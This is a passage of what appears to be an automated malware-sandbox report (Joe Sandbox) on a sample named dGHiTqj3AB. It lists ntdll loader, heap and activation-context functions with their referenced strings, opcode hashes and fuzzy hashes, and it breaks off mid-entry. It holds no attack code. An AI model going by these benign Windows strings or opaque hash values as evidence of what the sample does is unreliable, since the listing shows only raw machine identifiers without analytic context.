                                                • Instruction ID: 5b9f56dd1f4c21e262cdca9f6711748108fcb2d30180e6669f7b3a3fd131ba68
                                                • Opcode Fuzzy Hash: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
                                                • Instruction Fuzzy Hash: E0817B71A00358EBEB60CF99C884FAEBBF9AF49704F154119F508F7290D375AA41CB60
                                                Function 019329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 0197259B
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019725EB
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01972498
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01972409
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01972506
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0197261F
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01972624
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01972412
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019722E4
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019724C0
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01972602
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: d796c871fe6ebd53ffb3a963a829334dc542ab328431c9b75bc02a3849aa3742
                                                • Instruction ID: cbc630ef72e2c4b7aaa47b7823f5f3165d1b8964fd11654eed309a4c1c626b6d
                                                • Opcode Fuzzy Hash: d796c871fe6ebd53ffb3a963a829334dc542ab328431c9b75bc02a3849aa3742
                                                • Instruction Fuzzy Hash: 7E026FF1D042299BDB31DB54CC80B9AB7B8AF95714F0045EAE60DA7241EB30AF84CF59
                                                Function 019A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: 5595f0cc6562a6b4e0c5da607cdd04bbdb936f9ebcb6ed48086f9dd677bd9f00
                                                • Instruction ID: f0e05764dc94dfd3770350017223649544843854fc45b8f565f6430b1ae01d63
                                                • Opcode Fuzzy Hash: 5595f0cc6562a6b4e0c5da607cdd04bbdb936f9ebcb6ed48086f9dd677bd9f00
                                                • Instruction Fuzzy Hash: 3351BDB19043159BD329DF188844BABBBECEF94356F94492DAA9DC3240E774D608CBD2
                                                Function 019B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 7c1bfe039f67206d57e1041225673e2bdb21fc79623bcc166d1b7734002f52c5
                                                • Instruction ID: c8a7523742755437f2f28a55366a82144f67066d28776606ed108022af270ebf
                                                • Opcode Fuzzy Hash: 7c1bfe039f67206d57e1041225673e2bdb21fc79623bcc166d1b7734002f52c5
                                                • Instruction Fuzzy Hash: A8D1ED31600686EFDB22DF68C580AEEBBF6FF49710F18805DF5499B652D7389A81CB10
                                                Function 019889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: -*- final list of providers -*- , xrefs: 01988B8F
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01988A67
                                                • HandleTraces, xrefs: 01988C8F
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01988A3D
                                                • VerifierDebug, xrefs: 01988CA5
                                                • VerifierDlls, xrefs: 01988CBD
                                                • VerifierFlags, xrefs: 01988C50
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 10ace6c5a1d80f38552c84cc564d657b1851b6b6455aa613324bff9d968fbe9b
                                                • Instruction ID: d47328afef519ec3c6066b59458016bdadd08b6031b2fc0b311a88c69b49bbbc
                                                • Opcode Fuzzy Hash: 10ace6c5a1d80f38552c84cc564d657b1851b6b6455aa613324bff9d968fbe9b
                                                • Instruction Fuzzy Hash: CF912671A45702AFE321FF288880F6A7BE8ABD4714F45051CFA4CAB295D730DD05C7A5
                                                Function 0190EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                • Opcode ID: 2a7200cd226444b508ef3d16e18b9283f88b34a2a2c069e730e63acbf2ad5b83
                                                • Instruction ID: afc1232fd6ffd5dd6c86d0c6cd7eba848f750baef4b96aa61e6178a937077264
                                                • Opcode Fuzzy Hash: 2a7200cd226444b508ef3d16e18b9283f88b34a2a2c069e730e63acbf2ad5b83
                                                • Instruction Fuzzy Hash: 49A24970A0562A8FDB75CF58CD88BA9BBB9BF45705F1446E9D90DA7290DB309E80CF10
                                                Function 019363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 3bb0545e4a0d05c297e9a61aa9b20f7d753de4898e3ef62636b8dec66f9cbd78
                                                • Instruction ID: 10245fa341667ec717faf7c4a74911232ef3be031d5c9f2a2d4575811c58bc95
                                                • Opcode Fuzzy Hash: 3bb0545e4a0d05c297e9a61aa9b20f7d753de4898e3ef62636b8dec66f9cbd78
                                                • Instruction Fuzzy Hash: A1913870F05315BBEB35EF18E848BAA7BA5BFD1B24F14012CE90C6B282DB749941C791
                                                Function 018F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019599ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01959A2A
                                                • apphelp.dll, xrefs: 018F6496
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01959A11, 01959A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01959A01
                                                • LdrpInitShimEngine, xrefs: 019599F4, 01959A07, 01959A30
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: a0f6e72438afd6a0c4a9b30e149e6b4db27c4b3c02109c407f0102956172c074
                                                • Instruction ID: e1eaf1049a85c6801896264774070003c5a30fa60b2dba7f474f1cc0dcee71d4
                                                • Opcode Fuzzy Hash: a0f6e72438afd6a0c4a9b30e149e6b4db27c4b3c02109c407f0102956172c074
                                                • Instruction Fuzzy Hash: 54518071208305EFE725DF24D985B5B77E9FB84748F10091DFA89A7250E730EA44CBA2
                                                Function 0193C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializeImportRedirection, xrefs: 01978177, 019781EB
                                                • LdrpInitializeProcess, xrefs: 0193C6C4
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0193C6C3
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01978181, 019781F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01978170
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 019781E5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: eee8f5867ee53f54299fdc17da9d05436409ec2e94c85fa1adb574cfc55e5da7
                                                • Instruction ID: 850dedf0100421dbf2964605e35d74f26d496453121060d25b30d5be29325830
                                                • Opcode Fuzzy Hash: eee8f5867ee53f54299fdc17da9d05436409ec2e94c85fa1adb574cfc55e5da7
                                                • Instruction Fuzzy Hash: AD310771748706ABC214EF29DC8AE1A77E4FFD4B14F04055CF949AB391EA24ED04C7A2
                                                Function 01932674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019721BF
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01972178
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0197219F
                                                • RtlGetAssemblyStorageRoot, xrefs: 01972160, 0197219A, 019721BA
                                                • SXS: %s() passed the empty activation context, xrefs: 01972165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01972180
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: d8f96ddb34a78ce8c6e04d422c53454aee73f0311479ad1ca222a0fe2ac0b84c
                                                • Instruction ID: 33b329cf4187522d4fa73aa2d7620fbdc48ddf0f4eedd1ec7645f654863040ea
                                                • Opcode Fuzzy Hash: d8f96ddb34a78ce8c6e04d422c53454aee73f0311479ad1ca222a0fe2ac0b84c
                                                • Instruction Fuzzy Hash: F031E636B402257BE7229B999C85F5A7BB8FFE5B90F050059FB0DA7240D270AB00C7E1
                                                Function 0194096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 01942DF0: LdrInitializeThunk.NTDLL ref: 01942DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D74
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: de1a1a5018d1c1e22b8517eb059bfc62007fdc64a2dce3f20e76c1bfc470e450
                                                • Instruction ID: 8e90210befef8a2ee5e442880e3eb6b07959b2889990fef6d864c9ad9e692405
                                                • Opcode Fuzzy Hash: de1a1a5018d1c1e22b8517eb059bfc62007fdc64a2dce3f20e76c1bfc470e450
                                                • Instruction Fuzzy Hash: 24423875900715DFDB21CF68C880BAAB7F9FF44314F1445A9EA8DAB241E770AA84CF61
                                                Function 0190A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: fe7d07beef7462fca42b8e41393ec84dd5ef29b090696cf857fde7243ec2bf37
                                                • Instruction ID: 777117859cf992ccf251473d72037874bcef7a1544d4568abed5eea6c551410b
                                                • Opcode Fuzzy Hash: fe7d07beef7462fca42b8e41393ec84dd5ef29b090696cf857fde7243ec2bf37
                                                • Instruction Fuzzy Hash: 45C19075508386CFD712CF58C440B6AB7E8FF84704F044969F999CB291E739C949CBA2
                                                Function 01938402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializeProcess, xrefs: 01938422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01938421
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0193855E
                                                • @, xrefs: 01938591
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: cf26d6177e6a34811b10f5a61cd0376a3edfddf67d083dd45612bbfbc692815a
                                                • Instruction ID: bf321a0c0b9e170508b3a8bf08e3e4de3f1e71a6fffd61ed9b7a09d7b33d195b
                                                • Opcode Fuzzy Hash: cf26d6177e6a34811b10f5a61cd0376a3edfddf67d083dd45612bbfbc692815a
                                                • Instruction Fuzzy Hash: 67918C71648345AFE722DF65DC40EABBBECBFC4744F40092EFA8892151E734DA448B62
                                                Function 0193273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 019721DE
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019722B6
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019721D9, 019722B1
                                                • .Local, xrefs: 019328D8
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 890646c30becdb042487539625fc4e0bbae51a2a549ddd04a2682086169f511d
                                                • Instruction ID: 6eda3f50e0100ad17dc1670c8493c559ac924bd9d5b75958e260fa37a41edf81
                                                • Opcode Fuzzy Hash: 890646c30becdb042487539625fc4e0bbae51a2a549ddd04a2682086169f511d
                                                • Instruction Fuzzy Hash: 1BA1BF35900229DBDB25CF68D888BA9B7B5BF98314F2545E9D90CAB251D730EE81CF90
                                                Function 01934AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0197342A
                                                • RtlDeactivateActivationContext, xrefs: 01973425, 01973432, 01973451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01973456
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01973437
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 0caf2baed8d42535102ced0820b5af67dcd559c3f44826c8eeba8d6725cd27bb
                                                • Instruction ID: 0048d7d03568361f33247182d40b88825cf399d2beabd6e97f44b27eb48080c9
                                                • Opcode Fuzzy Hash: 0caf2baed8d42535102ced0820b5af67dcd559c3f44826c8eeba8d6725cd27bb
                                                • Instruction Fuzzy Hash: 876103366407129BD726CF1DC881F2AB7E9FFC0B51F158529E85D9B241DB34EA01CB91
                                                Function 019064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0196106B
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019610AE
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01961028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01960FE5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: a588dc3e8de5b143f92a67168920c1cb6079bda78f0507a8be765b1fb7c3a669
                                                • Instruction ID: fe11e73a932678577a4b6492b86d3b76160affa941b9bf67ead1a27cd537f55a
                                                • Opcode Fuzzy Hash: a588dc3e8de5b143f92a67168920c1cb6079bda78f0507a8be765b1fb7c3a669
                                                • Instruction Fuzzy Hash: 5371BEB19043459FCB22EF14C885F977FACAF95764F400468F94C8B286D735D588CBA1
                                                Function 0192245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpDynamicShimModule, xrefs: 0196A998
                                                • apphelp.dll, xrefs: 01922462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0196A9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0196A992
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: cc14b1c7a6aa7570d3432e98edf3302d37144789e371a8f415d441609135eedb
                                                • Instruction ID: fd1ae472f8e294af80c0710fe4a183b892d9bf75511eefd8040adbe9cf67e299
                                                • Opcode Fuzzy Hash: cc14b1c7a6aa7570d3432e98edf3302d37144789e371a8f415d441609135eedb
                                                • Instruction Fuzzy Hash: A3315971600301BBDB31DF5DD885E6A77BDFB80B00F25001EE909B7245D7745A81CB91
                                                Function 019129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01913255
                                                • HEAP: , xrefs: 01913264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0191327D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 42fcae779c30e8acac3c5f786d8372fd1ff8e8970bfb2f2ffc4b1eb00b6c5e40
                                                • Instruction ID: c1a2a006b3fb2cb9b3b7cfc771afe091da632a7396491f7651f0a22be8eb97c2
                                                • Opcode Fuzzy Hash: 42fcae779c30e8acac3c5f786d8372fd1ff8e8970bfb2f2ffc4b1eb00b6c5e40
                                                • Instruction Fuzzy Hash: 1D92CF71E042499FEB25CF68C440BAEBBF5FF49310F148459E94AAB395D334AA85CF50
                                                Function 01910770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 4300efa36a32a254e1c936d985d6cf7d89ee224fd86c513947992b8332d7dc6c
                                                • Instruction ID: 7c5492e7f9190cf4f718cd99da5b924e19a123b9112ee0fb05936202f95b7227
                                                • Opcode Fuzzy Hash: 4300efa36a32a254e1c936d985d6cf7d89ee224fd86c513947992b8332d7dc6c
                                                • Instruction Fuzzy Hash: 83F1AD3060060ADFEB15CF68C894F6AB7B9FF44700F1945A8E51A9B385D735E9C1CBA1
                                                Function 01926962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: ce06b6ce3b01b5a1d5490509099de90b22e5a25b32b7b3c3d44d646a7d0444ef
                                                • Instruction ID: dfe4ceb2774c8f88e033d060586ed3993078c96600e0c5f87fb12a1d3cc24d40
                                                • Opcode Fuzzy Hash: ce06b6ce3b01b5a1d5490509099de90b22e5a25b32b7b3c3d44d646a7d0444ef
                                                • Instruction Fuzzy Hash: A8C27E716083519FDB29CF68C880BABBBE9AF98714F04892DF9CD97245D734D844CB62
                                                Function 018FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: c199a5b053c069b8d4e8d1050229e0ddf0a9c39b8b11cd3ff96ad19e6af3309f
                                                • Instruction ID: 89aecf0d21c1ae315dc66e32f107f0e7a7d2b85567ee6789b2e9aaef9d966008
                                                • Opcode Fuzzy Hash: c199a5b053c069b8d4e8d1050229e0ddf0a9c39b8b11cd3ff96ad19e6af3309f
                                                • Instruction Fuzzy Hash: 40A15A759016299BDB61DF28CC88BAABBB8EF44B10F1001E9EA0DA7250D7359F84CF50
                                                Function 01920BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to allocated memory for shimmed module list, xrefs: 0196A10F
                                                • LdrpCheckModule, xrefs: 0196A117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0196A121
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: 2d32661c580eb1edd8dbb6d6bae5a269901d8dd64ee14b33b4c19f563a68ee05
                                                • Instruction ID: 51231e7893327daa55bc846a55caf6675558924adb5a2abddb4a4b0c312bdcd7
